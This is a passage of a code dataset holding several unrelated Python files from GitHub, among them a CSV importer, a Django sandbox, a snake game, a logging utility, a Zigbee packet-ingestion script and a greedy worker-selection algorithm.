actor_1_name, movie_title, num_voted_users, cast_total_facebook_likes, \"\n \"actor_3_name, facenumber_in_poster, plot_keywords, \"\n \"movie_imdb_link, num_user_for_reviews, language, country, content_rating, \"\n \"budget REAL, \"\n \"title_year, actor_2_facebook_likes, imdb_score, aspect_ratio, movie_facebook_likes);\")\n\n print(\"Table created successfully\")\n\n\ndef db_import_csv():\n with open('movie_metadata.csv', 'r', encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader)\n for line in csv_reader:\n if line[8] != '' and line[22] != '':\n conn.execute(\"INSERT into movie_table values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\",\n (str(line[0]), str(line[1]), str(line[2]), str(line[3]), str(line[4]), str(line[5]),\n str(line[6]), str(line[7]), float(line[8]), str(line[9]), str(line[10]), str(line[11]),\n str(line[12]), str(line[13]), str(line[14]), str(line[15]), str(line[16]), str(line[17]),\n str(line[18]), str(line[19]), str(line[20]), str(line[21]), float(line[22]),\n str(line[23]),\n str(line[24]), str(line[25]), str(line[26]), str(line[27])))\n\n print(\"Data imported successfully\")\n\n\ndb_drop_table()\ndb_create_table()\ndb_import_csv()\nconn.commit()\nconn.close()\nprint(\"close connection to sqlite3\")\n","repo_name":"FuqingWang/Movie_Analyzer","sub_path":"data_importer.py","file_name":"data_importer.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23323264673","text":"# -*- coding:utf-8 -*-\nimport django\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db import connections\nfrom django.core.management.color import no_style\n\n\nsettings.configure(\n DEBUG=True,\n DATABASES={\"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\"\n }},\n INSTALLED_APPS=[__name__]\n)\n\ndjango.setup()\n\n\ndef create_table(model):\n connection = connections['default']\n if hasattr(connection, \"schema_editor\"):\n with connection.schema_editor() as schema_editor:\n schema_editor.create_model(model)\n else:\n cursor = connection.cursor()\n sql, references = connection.creation.sql_create_model(model, no_style())\n for statement in sql:\n cursor.execute(statement)\n\n for f in model._meta.many_to_many:\n create_table(f.rel.through)\n\n\nclass X(models.Model):\n name = models.CharField(max_length=255, default=\"foo\", blank=True)\n\n class Meta:\n app_label = __name__\n\n\nclass Y(models.Model):\n name = models.CharField(max_length=255, default=\"foo\", blank=True)\n\n class Meta:\n app_label = __name__\n\n\nclass XorY(models.Model):\n x_id = models.IntegerField(null=True)\n y_id = models.IntegerField(null=True)\n\n class Meta:\n app_label = __name__\n managed = False\n\n def convert(self):\n if self.x_id != -1:\n return X(id=self.x_id)\n else:\n return Y(id=self.y_id)\n\n\ndef create_view():\n connection = connections['default']\n cursor = connection.cursor()\n sql = \"\"\"\\\ncreate view {prefix}_xory as\n select id as x_id,\n -1 as y_id,\n -1 as id\n from {prefix}_x\n union all\n select -1 as x_id,\n id as y_id,\n -1 as id\n from {prefix}_y\n\"\"\".format(prefix=__name__)\n cursor.execute(sql)\n cursor.fetchall()\n\nif __name__ == \"__main__\":\n import logging\n logging.basicConfig(level=logging.DEBUG)\n\n django.setup()\n\n create_table(X)\n create_table(Y)\n create_view()\n\n xs = X.objects.bulk_create([X(id=1), X(id=2), X(id=3)])\n ys = Y.objects.bulk_create([Y(id=1), Y(id=2), Y(id=3)])\n\n print(X.objects.count())\n for x_or_y in XorY.objects.all():\n instance = x_or_y.convert()\n instance.name = \"bar\"\n instance.save()\n print(X.objects.count())\n","repo_name":"podhmo/django-sandbox","sub_path":"model-sample5.py","file_name":"model-sample5.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"8827796112","text":"import pandas as pd\r\nfrom collections import defaultdict\r\n\r\nclass HoloCSV():\r\n def __init__(self, csv_file):\r\n self.original = pd.read_csv(csv_file)\r\n self.original = self.original.dropna()\r\n self.total_posts_dict = defaultdict(int)\r\n self.day_count_dict = defaultdict(int)\r\n self.list_of_flairs = ['Subbed/TL', 'Meme', 'Music', 'Streams/Videos', 'Discussion',\r\n 'Fan Content (OP)', 'Misc.', 'Fan Content (Non-OP)', 'Suggestions', 'Goodies',\r\n 'NSFW', 'None', 'Special'] # special is for hololive member posts\r\n self.total_posts_per_day()\r\n self.post_count_df = self.total_post_df()\r\n self.new_cols(self.post_count_df)\r\n\r\n self.total_posts_per_day(use='day')\r\n self.day_count_df = self.total_post_df(use='day')\r\n self.new_cols(self.day_count_df)\r\n\r\n def get_total_count(self, col, use='date'):\r\n if use == 'day':\r\n self.day_count_dict[col] += 1\r\n else:\r\n self.total_posts_dict[col] += 1\r\n\r\n def total_posts_per_day(self, use='date'):\r\n if use == 'day':\r\n self.original['Day of the Week'].apply(lambda row: self.get_total_count(row, 'day'))\r\n else:\r\n self.original['Date'].apply(lambda row: self.get_total_count(row))\r\n\r\n def total_post_df(self, use='date'):\r\n if use == 'day':\r\n return pd.DataFrame(self.day_count_dict.items(), columns=['Day of the Week', 'Number of Posts'])\r\n else:\r\n return pd.DataFrame(self.total_posts_dict.items(), columns=['Date', 'Number of Posts'])\r\n\r\n def new_cols(self, df):\r\n for flair in self.list_of_flairs:\r\n df[flair] = 0\r\n\r\n def flair_count_adder(self, flair, date, use='date'):\r\n if flair not in self.list_of_flairs:\r\n flair = 'Special'\r\n\r\n if use == 'day':\r\n index = self.day_count_df[self.day_count_df['Day of the Week'] == date].index.tolist()\r\n self.day_count_df.loc[index, flair] += 1\r\n else:\r\n index = self.post_count_df[self.post_count_df['Date'] == date].index.tolist()\r\n self.post_count_df.loc[index, flair] += 1\r\n\r\n\r\n def get_individual_flair_count(self, use='date'):\r\n if use == 'day':\r\n self.original.apply(lambda row: self.flair_count_adder(row['Flair'], row['Day of the Week'], 'day'), axis=1)\r\n else:\r\n self.original.apply(lambda row: self.flair_count_adder(row['Flair'], row['Date']), axis=1)\r\n\r\nif __name__ == '__main__':\r\n file = 'C:/Users/phill/Desktop/projects/holo/hololive_sep_2020.csv'\r\n\r\n testing = HoloCSV(file)\r\n print(testing.original['Flair'].unique())\r\n #testing.post_count_df.loc[0, 'Special'] += 1\r\n testing.get_individual_flair_count()\r\n testing.post_count_df.to_csv('post_info.csv', encoding='utf-8', index=False)\r\n\r\n #testing.new_cols(testing.day_count_df)\r\n #print(testing.day_count_df)\r\n testing.get_individual_flair_count(use='day')\r\n testing.day_count_df.to_csv('day_info.csv', encoding='utf-8', index=False)\r\n","repo_name":"laphynis/Analysis-of-r-Hololive","sub_path":"cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23547013491","text":"num_of_loops = int(input())\n\ndef solution(case):\n case = case.split(\" \")\n pancakes = case[0]\n k = int(case[1])\n total_flips = 0\n #print(pancakes, str(k), \"IMPOSSIBLE\")\n counter = 0\n pancakes = list(pancakes)\n while (counter < len(pancakes) - k + 1):\n if (pancakes[counter] == \"-\"):\n for j in range(counter, counter + k):\n if (pancakes[j] == \"-\"):\n pancakes[j] = \"+\"\n else:\n pancakes[j] = \"-\"\n #print(j)\n #print(pancakes)\n #print(\"flips\")\n total_flips += 1\n counter += 1\n cond = True\n for i in range(len(pancakes)):\n if (pancakes[i] == \"-\"):\n cond = False\n #print(total_flips, cond)\n if (cond):\n return str(total_flips)\n else:\n return (\"IMPOSSIBLE\")\n return (\" \")\n\nfor i in range(num_of_loops):\n print(\"Case #\"+str(i+1)+\": \" + solution(input()))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3633.py","file_name":"3633.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26170982001","text":"import palindrome as pd\nlol=[]\nn=int(input(\"Enter the number of words:\"))\nfor i in range(0,n):\n l=[]\n s=input(\"Enter the word:\")\n l.append(s)\n lol.append(l)\nfor i in lol:\n for j in i:\n if(pd.recpalindrome(j)==True):\n print(j,\"is a palindrome\")\n else:\n print(j,\"is not a palindrome\")\n","repo_name":"nithu2109/PythonLLabsem5","sub_path":"Lab on 11-10/Problem 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74893203713","text":"import pygame\nimport sys\nimport random\n\nclass snake(object):\n def __init__(self):\n self.length = 1\n self.width = 1\n self.positions = [((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))]\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\n self.color = (93, 216, 228)\n\n def get_head_pos(self):\n return self.positions[0]\n\n def turn(self,point):\n if self.length > 1 and (point[0]*-1, point[1]*-1) == self.direction:\n return\n else:\n self.direction = point\n \n def move(self, score):\n current = self.get_head_pos()\n x,y = self.direction\n new = (((current[0] + x*GRID_SIZE) % SCREEN_WIDTH), (current[1] + y*GRID_SIZE) % SCREEN_HEIGHT)\n if len(self.positions) > 2 and new in self.positions[2:]:\n self.reset()\n return 0\n else:\n self.positions.insert(0, new)\n if len(self.positions) > self.length:\n self.positions.pop()\n return score\n\n def reset(self):\n self.length = 1\n self.positions = [((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))]\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\n \n def draw(self, surface):\n for p in self.positions:\n r = pygame.Rect((p[0], p[1]), (GRID_SIZE, GRID_SIZE))\n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (17, 24, 47), r, 1)\n\n def handle_keys(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.turn(UP)\n if event.key == pygame.K_DOWN:\n self.turn(DOWN)\n if event.key == pygame.K_LEFT:\n self.turn(LEFT)\n if event.key == pygame.K_RIGHT:\n self.turn(RIGHT)\n\nclass food(object):\n def __init__(self):\n self.position = (0,0)\n self.color = (223, 163, 49)\n self.randomize_pos()\n\n def randomize_pos(self):\n self.position = (random.randint(0, GRID_WIDTH-1) * GRID_SIZE, random.randint(0, GRID_HEIGHT-1) * GRID_SIZE)\n\n def draw(self,surface):\n r = pygame.Rect((self.position[0], self.position[1]), (GRID_SIZE, GRID_SIZE)) \n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (17, 24, 47), r, 1)\n\ndef drawGrid(surface):\n for y in range(0, int(GRID_HEIGHT)):\n for x in range(0, int(GRID_WIDTH)):\n if (x + y) % 2 == 0:\n r = pygame.Rect((x*GRID_SIZE, y*GRID_SIZE), (GRID_SIZE,\n GRID_SIZE))\n pygame.draw.rect(surface, (17, 24, 47), r)\n else:\n rr = pygame.Rect((x*GRID_SIZE, y*GRID_SIZE), (GRID_SIZE, GRID_SIZE))\n pygame.draw.rect(surface, (23, 35, 58), rr)\n\nSCREEN_WIDTH = 1600\nSCREEN_HEIGHT = 1600\n\nGRID_SIZE = 80\nGRID_WIDTH = SCREEN_HEIGHT / GRID_SIZE\nGRID_HEIGHT = SCREEN_WIDTH / GRID_SIZE\n\nUP = (0, -1)\nDOWN = (0, 1)\nLEFT = (-1, 0)\nRIGHT = (1, 0)\n\ndef main():\n pygame.init()\n\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0 ,32)\n\n surface = pygame.Surface(screen.get_size())\n surface = surface.convert()\n drawGrid(surface)\n\n snek = snake()\n snaks = []\n for i in range(20):\n snack = food()\n snaks.append(snack)\n myfont = pygame.font.SysFont('arial', 64)\n \n score = 0\n while(True):\n clock.tick(10)\n snek.handle_keys()\n\n drawGrid(surface)\n score = snek.move(score)\n if score == 0 and len(snaks) > 20:\n del snaks[20:]\n for snack in snaks:\n if snek.get_head_pos() == snack.position:\n snek.length += 1\n score += 1\n snack.randomize_pos()\n if len(snaks) < snek.length**2:\n for i in range(int(snek.length%5)):\n snak = food()\n snaks.append(snak)\n snek.draw(surface)\n snack.draw(surface)\n screen.blit(surface, (0, 0))\n text = myfont.render(\"Score {0}\".format(score), 1, (255, 255, 255))\n screen.blit(text, (5, 10))\n pygame.display.update()\n\nmain()\n","repo_name":"calvang/Snake-but-he-be-feasting","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17922295997","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nlog_utils.py - wraps python loggging facility for simple usage\n\"\"\"\nimport unittest\nimport logging.handlers\nimport os.path\nfrom datetime import datetime\nfrom file_utils import ReverseFileIterator\n\nDEFAULT_LOG_LEVEL = \"DEBUG\"\n\n# anything going wrong in this module\nclass LogUtilsError(Exception):\n \"\"\"\n exception for anything going wrong in this module\n \"\"\"\n def __init__(self, value):\n \"\"\"\n This is the exception constructor method\n \"\"\"\n Exception.__init__(self)\n self.value = value\n\n def __str__(self):\n \"\"\"\n Convert error object to a string\n \"\"\"\n return repr(self.value)\n\n# Logger class, features:\n# 1) the caller's file path and line number are printed with each message\n# 2) multiple instantiations of this object are possible in the same program\n# wherever you need to log, instantiate a Logger object and call its\n# debug() or info() or warning() or critical() function with a string\n#\n# Example usage:\n# >>> my_log_utils = Logger(\"log_filename\", \"DEBUG\")\n# >>> my_log_utils.debug(\"oh no, what have i done!\")\n# or\n# >>> my_log_utils.info(\"oh no, what have i done!\")\n# and so on..\n#\n# 1st argument to Logger(): the filename to which logging occurs\n# 2nd argument to Logger: the log level above which we do not log\n\nclass Logger():\n \"\"\"\n Analyze video text to find entities (cards from the cards table)\n in it and return a list of entities per video as well as a score\n for each entity, reflecting the confidence that the entity\n corresponds to entities depicted in the video. The main function\n to use from this class is analyzeVideoEntities() but it has other\n useful text analysis tools embedded.\n \"\"\"\n\n def __init__(self, s_log_filename, s_log_level=os.environ.get('LOG_LEVEL')):\n \"\"\"\n Constructor: initializes logging\n 1st argument: the filename to which logging occurs\n 2nd argument: the log level above which we do not log\n (hierarchy is debug->info->warning->error->critical)\n \"\"\"\n if not s_log_level:\n s_log_level = DEFAULT_LOG_LEVEL\n\n self._log = self._init_logging(s_log_filename, s_log_level)\n\n\n @staticmethod\n def _init_logging(s_log_filename, s_log_level):\n \"\"\"\n Set up the member variable self._log for logging use.\n \"\"\"\n # NB: using the log filename as the log_utils name\n log_utils = logging.getLogger(s_log_filename)\n\n # this is how we tell if we have already set-up the handlers for\n # the log_utils instantiated in this class, if yes, don't do it again..\n if log_utils.handlers:\n # we have a handler already, we do need to set up its formatter\n # to the\n return log_utils\n\n # max size of log file before it gets rotated, not relevant to html\n # logging\n max_log_file_size = 9000000\n\n # number of backups we keep of log files when they get recycled when\n # they reach MAX_LOG_FILE_SIZE number of bytes, not relevant to html\n # logging\n max_log_file_backups = 9\n\n log_utils.propagate = False\n\n log_level_dict = {\n 'DEBUG': logging.DEBUG,\n 'INFO': logging.INFO,\n 'WARNING': logging.WARNING,\n 'ERROR': logging.ERROR,\n 'CRITICAL': logging.CRITICAL\n }\n\n log_utils.setLevel(log_level_dict[s_log_level.upper()])\n\n handler = logging.handlers.RotatingFileHandler(\n s_log_filename,\n maxBytes=max_log_file_size,\n backupCount=max_log_file_backups)\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\n\n handler.setFormatter(formatter)\n log_utils.addHandler(handler)\n\n return log_utils\n\n # NOTE: the functions below have repeated code - it has to remain\n # this way, because when the repeated code (first four lines of\n # each of the functions below) is put in its own function, it\n # messes up the value returned by self._log.findCaller() such that\n # instead of returning the file which called this module, it returns\n # this module's file.\n\n def debug(self, s_message):\n \"\"\"\n write debug message\n \"\"\"\n self._log.debug(s_message)\n\n def info(self, s_message):\n \"\"\"\n write info message\n \"\"\"\n self._log.info(s_message)\n\n def warning(self, s_message):\n \"\"\"\n write warning message\n \"\"\"\n self._log.warning(s_message)\n\n def error(self, s_message):\n \"\"\"\n write error message\n \"\"\"\n self._log.error(s_message)\n\n\n def critical(self, s_message):\n \"\"\"\n write critical message\n \"\"\"\n self._log.critical(s_message)\n\ndef log_warning(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.warning(s_phrase)\n\ndef log_info(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.info(s_phrase)\n\ndef log_critical(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.critical(s_phrase)\n\ndef log_error(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.error(s_phrase)\n\ndef log_debug(log_obj, s_phrase):\n \"\"\"\n helper function to know if to log to a file or stdout based on 'log_obj'\n being None or not\n \"\"\"\n if log_obj is None:\n print(s_phrase)\n else:\n log_obj.debug(s_phrase)\n\ndef init_logging(log_obj, s_name=\"unnamed\"):\n \"\"\"\n generic initializer from log obj 'log_obj' - returns None (i.e. does\n nothing) if 'log_obj' is False; returns 'log_obj' if it is not None\n and if it is None, returns a newly created default log object whose\n file is in the directory os.environ[\"LOG_DIR\"] and filename is 's_name'\n \"\"\"\n if log_obj is False:\n return None\n\n if log_obj is not None:\n return log_obj\n\n s_log_dir = os.environ.get(\"LOG_DIR\")\n if s_log_dir is None:\n s_log_dir = \".\"\n s_date = datetime.strftime(datetime.now(), '%Y-%m-%d')\n\n return Logger(os.path.join(s_log_dir, s_date+\"_\"+s_name+\".log\"))\n\ndef get_log_line_components(s_line):\n \"\"\"\n given a log line, returns its datetime as a datetime object\n and its log level as a string and the message itself as another\n string - those three are returned as a tuple. the log level\n is returned as a single character (first character of the level's\n name, capitalized).\n \"\"\"\n try:\n dtime = datetime.strptime(s_line[0:19], \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n raise LogUtilsError(\"Not a proper date/time at start of log line!\")\n\n if dtime is None:\n raise LogUtilsError(\"Not a proper date/time at start of log line!\")\n\n log_level = s_line[24]\n\n if log_level == \"D\":\n s_line = s_line[30:]\n elif log_level == \"I\":\n s_line = s_line[29:]\n elif log_level == \"W\":\n s_line = s_line[32:]\n elif log_level == \"E\":\n s_line = s_line[30:]\n elif log_level == \"C\":\n s_line = s_line[33:]\n else:\n raise LogUtilsError(\"log-level not in log line!\")\n\n return s_line, dtime, log_level\n\n\nclass ReverseLogFileIterator():\n \"\"\"\n class to iterate through a log file from end to start, verifying\n that the last line is a warning line has an \"END\" in it and\n iterating through lines only until the first encounter of a line\n with \"START\" in it (if no such START warning line is found an\n error is thrown, same for case when no END line is found).\n \"\"\"\n\n def __init__(self, s_log_filename):\n \"\"\"\n do some checking right off the bat\n \"\"\"\n self._s_log_filename = s_log_filename\n self._iterator = ReverseFileIterator(s_log_filename)\n self._b_started = False\n self._b_ended = False\n\n def __iter__(self):\n \"\"\"\n part of allowing this class's objects to also be used as iterators\n \"\"\"\n return self\n\n def __next__(self):\n \"\"\"\n next..\n \"\"\"\n if self._b_ended is True:\n raise StopIteration\n\n try:\n s_line = self._iterator.__next__()\n except StopIteration:\n if not self._b_started:\n raise LogUtilsError(\"log file %s has no START directive!\" %\n (self._s_log_filename,))\n if not self._b_ended:\n raise LogUtilsError(\"log file %s has no END directive!\" %\n (self._s_log_filename,))\n\n s_message, dtime, log_level = get_log_line_components(s_line)\n\n if self._b_started is False:\n # only on 1st iteration do we get here\n if len(s_message) < 3 or s_message[0:3] != \"END\":\n raise LogUtilsError(\"Last line has no 'END'; file: %s\" %\n (self._s_log_filename,))\n\n self._b_started = True\n return s_message, dtime, log_level\n\n # only on non 1st iteration do we get here, you should never find an\n # 'END' in the line again!\n if len(s_message) >= 3 and s_message[0:3] == \"END\":\n raise LogUtilsError(\"2nd 'END' found before any 'START'!\")\n if len(s_message) >= 5 and s_message[0:5] == \"START\":\n # on the next iteration we'll raise a StopIteration\n self._b_ended = True\n\n return s_message, dtime, log_level\n\n def all(self):\n \"\"\"\n runs next() over and over until the end\n \"\"\"\n return [i for i in self]\n\ndef verify_last_log_session(s_log_filename, log_obj=None):\n \"\"\"\n verify some basic things about last log session, returns the\n duration of the entire session if successful, or None, if\n verification failed\n \"\"\"\n # s_short_filename = os.path.split(s_log_filename)[-1]\n end_dtime = None\n n_errors = 0\n n_criticals = 0\n n_warnings = 0\n n_lines = 0\n dtime = None\n for s_line, dtime, s_log_type in ReverseLogFileIterator(s_log_filename):\n s_line_len = len(s_line) > 0\n assert s_line_len > 0\n if s_log_type == \"E\":\n n_errors += 1\n elif s_log_type == \"C\":\n n_criticals += 1\n elif s_log_type == \"W\":\n n_warnings += 1\n\n if not end_dtime:\n end_dtime = dtime\n\n n_lines += 1\n\n # start_time = dtime\n # delta_time = end_dtime-start_time\n assert dtime is not None\n delta_time = end_dtime-dtime\n\n if log_obj:\n # log_obj.info(\"session duration (seconds): %d\" % delta_time.seconds)\n if n_warnings > 0:\n log_obj.warning(\"# of warnings: %d\" % n_warnings)\n if n_errors > 0:\n log_obj.error(\"# of errors: %d\" % n_errors)\n if n_criticals > 0:\n log_obj.critical(\"# of criticals: %d\" % n_criticals)\n\n return delta_time, n_lines, n_warnings, n_errors, n_criticals\n\ndef get_last_session_query(s_log_filename):\n \"\"\"\n returns first query line it encounters while traversing the\n last session in a log file backwards\n \"\"\"\n # s_short_filename = os.path.split(s_log_filename)[-1]\n for s_line, dtime, s_log_type in ReverseLogFileIterator(s_log_filename):\n del dtime\n del s_log_type\n if s_line[0:6] == 'query:':\n return s_line[6:].strip()\n\n return None\n\nclass ModuleTests(unittest.TestCase):\n \"\"\"\n module tests\n \"\"\"\n @staticmethod\n def test01():\n \"\"\"\n a very basic test\n \"\"\"\n log = Logger(\"log_utils.log\", \"DEBUG\")\n log.debug(\"-->debug<--:hello world!\")\n log.info(\"-->info<--:hello world!\")\n log.warning(\"-->warning<--:hello world!\")\n log.error(\"-->error<--:hello world!\")\n log.critical(\"-->critical<--:hello world!\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"dorontal/python-scrapers","sub_path":"log_utils.py","file_name":"log_utils.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32618524706","text":"import nonebot\nfrom nonebot.adapters.console import Adapter as ConsoleAdapter\n\n\nnonebot.init()\n\n\ndriver = nonebot.get_driver()\ndriver.register_adapter(ConsoleAdapter)\n\n\nnonebot.load_builtin_plugins(\"echo\") # 内置插件\n# nonebot.load_plugin(\"third_party_plugin\") # 第三方插件\n# nonebot.load_plugins(\"awesome_bot/plugins\") # 本地插件\n\n\nif __name__ == \"__main__\":\n nonebot.run()","repo_name":"ilyaw39/Isten","sub_path":"client/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43071200211","text":"import json\nimport os\nimport shutil\n\ncontract_dirs = [d for d in os.listdir('../out') if d.endswith('.sol')]\n\nfor d in contract_dirs:\n contract_files = os.listdir(os.path.join('../out', d))\n for contract_file in contract_files:\n contract_name = contract_file[:-5]\n contract_path = os.path.join('../out', d, contract_file)\n\n shutil.copyfile(\n contract_path, 'flood_contract_abi/abis/' + contract_file)\n","repo_name":"fulmin-labs/flood-contracts","sub_path":"python/copy_abis.py","file_name":"copy_abis.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"75248898","text":"def largestIsland(grid):\n m, n = len(grid), len(grid[0])\n \n colors = {0:0}\n \n def dfs(x, y, color):\n grid[x][y] = color\n visited.add((x, y))\n \n for i, j in ((x-1, y), (x+1, y), (x, y-1), (x,y+1)):\n if 0<=i=0:\n # print(\",top = \", grid[i-1][j], end = ' ')\n neighbors.add(grid[i-1][j])\n top = colors[grid[i-1][j]]\n if i+1=0:\n # print(\",left = \", grid[i][j-1], end = ' ')\n left = colors[grid[i][j-1]]\n neighbors.add(grid[i][j-1])\n if j+1 6 and not pkt.haslayer(ZigbeeZLLCommissioningCluster):\n valid = False # Traffic here is when a device has no short, and uses extended in its place before it gets\n # a short asisgned, good indicator that pan id conflict not underway, too much investment\n # for now but good for capstone\n\n if valid:\n #session = db.createDBSession()\n db.createPacket(session, rectime, panid, src, dest, pkt_raw, ext_src, nwk_src, nwk_ext)\n #session.close()\n except TypeError as e:\n print(\"TypeError raised: Likely malformed packet\")\n pass\n\n\ndef start_sniff(e):\n conf.dot15d4_protocol = \"zigbee\"\n sniff(iface=\"lo\", prn=parse_packet, stop_filter=lambda x: e.is_set())\n\n\nif __name__ == '__main__':\n event = threading.Event()\n start_sniff(event)\n","repo_name":"LeulBM/ToplogyTool","sub_path":"ingestion.py","file_name":"ingestion.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1570652239","text":"import sys\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm, trange\nfrom evolutionary import match_degree\nfrom square_ovlp_detection import Square\nfrom overlap_area import area\n\nclass Greedy:\n def __init__(self, points: np.ndarray, centers: np.ndarray, r: float, R: float, budget: float, bid: np.ndarray,\n weight: np.ndarray, kind: str):\n self.points = points\n self.centers = centers\n self.r = r\n self.R = R\n self.budget = budget\n self.bid = bid\n self.w = weight\n self.kind = kind\n\n self.squares = [Square(y + r, y - r, x - r, x + r) for x, y in points]\n\n self.num = len(points)\n self.matching_degree_all = match_degree(points, centers, R)\n self.matching_degree_proportion = self.matching_degree_all / np.sum(self.matching_degree_all)\n self.matching_degree_proportion[self.matching_degree_proportion < 0] = 0\n self.selected = []\n self.unselected = [i for i in range(len(points))]\n\n self.covered_area = 0\n self.total_area = area(self.squares)\n # marginal contribution per cost\n self.mcpc = np.zeros(self.num)\n\n def set_weight(self, w: np.ndarray):\n assert len(w) == 3, \"w's length is not 3\"\n self.w = w\n\n def set_bid(self, bid: np.ndarray):\n self.bid = bid\n\n def marginal_contribution(self, i):\n if self.kind == 'matching_degree':\n return self.matching_degree_proportion[i]\n else:\n this_area = area([self.squares[j] for j in self.selected + [i]])\n if self.kind == 'diversity':\n return this_area - self.covered_area\n else :\n return self.w[0] * 1 / self.num + self.w[1] * self.matching_degree_proportion[i] + \\\n self.w[2] * (this_area - self.covered_area) / self.total_area\n\n def total(self, max_i):\n temp_selected = self.selected + [max_i]\n if self.kind == 'matching_degree':\n return np.sum(self.matching_degree_proportion[np.array(temp_selected)])\n else:\n this_area = area([self.squares[_] for _ in temp_selected])\n if self.kind == 'diversity':\n return this_area\n else:\n return self.w[0] * ( len(self.selected) + 1 ) / num + \\\n self.w[1] * np.sum(self.matching_degree_proportion[np.array(temp_selected)]) + \\\n self.w[2] * this_area / self.total_area\n\n def quantity_driven(self):\n sorted_bid = np.sort(self.bid)\n sorted_bid_index = np.argsort(self.bid)\n foo = self.budget / np.arange(1, len(sorted_bid)+1) >= sorted_bid\n self.selected = [sorted_bid_index[_] for _ in range(len(sorted_bid)) if foo[_]]\n\n def one_round(self):\n for i in self.unselected:\n foo = self.marginal_contribution(i)\n self.mcpc[i] = foo / self.bid[i]\n\n max_i = np.argmax(self.mcpc)\n self.total_value = self.total(max_i)\n\n return max_i\n\n def greedy_selection(self):\n '''\n\n :param w: w is a vector of three elements, representing the weight of three measurement\n :return:\n '''\n max_mcpc_index = np.argmin(self.bid)\n self.mcpc[max_mcpc_index] = self.marginal_contribution(max_mcpc_index)\n self.covered_area = 4 * self.r**2\n self.total_value = self.total(max_mcpc_index)\n\n pbar = tqdm(total=self.num)\n while len(self.unselected) > 0 and self.mcpc[max_mcpc_index] >= 2 * self.total_value / self.budget:\n pbar.update()\n self.selected.append(max_mcpc_index)\n self.unselected.remove(max_mcpc_index)\n self.mcpc[max_mcpc_index] = -1\n self.covered_area = area([self.squares[_] for _ in self.selected])\n max_mcpc_index = self.one_round()\n pbar.close()\n\n def clear(self):\n self.selected = []\n self.unselected = [_ for _ in range(self.num)]\n self.covered_area = 0\n self.mcpc = np.zeros(self.num)\n\n\n\nif __name__ == '__main__':\n kind = 'diversity'\n\n d = np.load('data/points.npz')\n points = d['points']\n labels = d['labels']\n centers = np.load('data/centers.npy')\n r = 0.4\n R = 5\n budget = 20000\n num = len(points)\n bid = np.random.uniform(0, 1, num) * 3 + 3\n weight = np.random.rand(3)\n weight[2] *= 2\n weight = weight / np.sum(weight)\n population = 1\n\n X = np.random.permutation(np.arange(len(points)))\n X = X[:num]\n greedy_object = Greedy(points[X], centers[labels][X], r, R, budget, bid, weight, kind)\n\n\n # print information\n print(\"kind = {}, budget = {}, U[3, 6]\".format(kind, budget))\n result = []\n for i in range(population):\n greedy_object.greedy_selection()\n\n m = np.sum(greedy_object.matching_degree_all[np.array(greedy_object.selected)])\n a = area([greedy_object.squares[i] for i in greedy_object.selected])\n result.append(np.array([len(greedy_object.selected), m, a]))\n\n greedy_object.clear()\n bid = np.random.uniform(0, 1, num) * 3 + 3\n 